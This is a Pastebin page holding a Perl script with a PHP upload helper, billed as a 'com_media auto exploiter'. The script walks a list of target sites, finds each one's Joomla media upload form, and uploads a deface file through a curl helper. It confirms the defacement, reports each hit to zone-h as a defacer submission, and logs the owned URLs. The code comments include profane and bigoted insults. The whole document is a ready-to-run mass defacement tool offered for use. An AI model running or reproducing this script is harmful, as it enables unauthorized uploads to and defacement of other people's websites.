Googleinurl

[SCRIPT]=> com_media auto exploiter [Perl/PHP]

Jul 30th, 2014
867
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. use LWP::UserAgent;
  2. use Term::ANSIColor;
  3. use Win32::Console::ANSI;
  4.  
  5.   # Download Direct : http://www.mediafire.com/download/afa6rb6907a6ztf/media_exploiter.rar
  6.   # Video : https://www.youtube.com/watch?v=dBMW9q4rxdw
  7.  
  8.                    # CoDed CrashBandicot
  9.                    # Gr33tz M-A , m0sta & all staff of exploit4arab
  10.                    # Fuck All Haters , ALL leechers , Lamers , zionist , Nationalist
  11.                    # FUck ALL noob Copying my script , respect coder please
  12.                    # if you use the .txt for deface change Keyword line 51 by your keywords
  13.                    # Using 2 method for recolt the url for the request post
  14.                    # Result in mediaResult.txt , don't rename file up.php
  15.  
  16. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
  17.  
  18. print color("bold green") ,"\n\n\t                com_media Auto Exploiter\n";
  19. print "\t           Usage : perl $0 list.txt owned.txt \n\n";
  20. print color 'reset';
  21. open(tarrget,"<$ARGV[0]") or die "$!";
  22. while(<tarrget>){
  23. chomp($_);
  24. $target = $_;
  25. if($target !~ /http:\/\//)
  26. {
  27. $target = "http://$target";
  28. }
  29.  
  30. $name = $ARGV[1];
  31.  
  32. $zeeb = $target."index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  33. $ua = LWP::UserAgent->new;
  34. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  35. $fucki = $ua->get($zeeb);
  36. $kzz = $fucki->content;
  37. if($kzz =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $kzz =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  38. {
  39.     print color("green"), "\n\n [+] com_media found -> $target"; print color 'reset'; sleep(1);
  40.  
  41.  $url = $1;
  42.  $url =~ s/&amp;/&/gi;
  43.  
  44.  } else { print "\n\n [+] com_media not found -> $target"; sleep(1);}
  45.  
  46. $fili = $target."images\/$name";
  47.  
  48.  system("php up.php $url $name");
  49. $ual = LWP::UserAgent->new;
  50. $ual->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  51. $trl = $ual->get($fili);
  52. if($trl->content =~ /by TeaM MosTa/) {
  53. print color("bold green"),"\n\n [+] Owned -> $fili"; print color 'reset';
  54.  
  55.                 $lwp = LWP::UserAgent->new;
  56.                 $res= $lwp->post("http://zone-h.org/notify/single",[
  57.                 'defacer'     => 'TeaM MosTa',
  58.                 'domain1'   => $fili,
  59.                 'hackmode' => '15',
  60.                 'reason'       => '1',
  61.                 'submit'       => 'Send',
  62.                 ]);
  63.                 if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
  64.                 print "\n      [+] Submit zone-h $1 "; sleep(1);
  65.                 }
  66.                 else
  67.                 {
  68.                 print "\n      [+] Submit zone-h ERROR"; sleep(1);
  69.                 }
  70.  
  71. open(fuck ,">>mediaResult.txt");
  72. print fuck "$fili\n";
  73. close fuck;
  74.  
  75. }
  76. else { print color("red"), "\n\n [+] Not Defaced $target"; print color 'reset'; sleep(1); }
  77.  
  78.  }
  79.  
  80.  
  81. ###################################################################################################
  82. # File name : up.php
  83.  
  84.  
  85.  
  86. <?php
  87. $url = $argv[1];
  88. $uploadfile = $argv[2];
  89. $ch = curl_init($url);
  90. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  91. curl_setopt($ch, CURLOPT_POST, true);
  92. curl_setopt($ch, CURLOPT_POSTFIELDS,
  93.  
  94. array('Filedata[]'=>"@$uploadfile"));
  95.  
  96. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  97.  
  98. $postResult = curl_exec($ch);
  99.  
  100. curl_close($ch);
  101.  
  102. ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×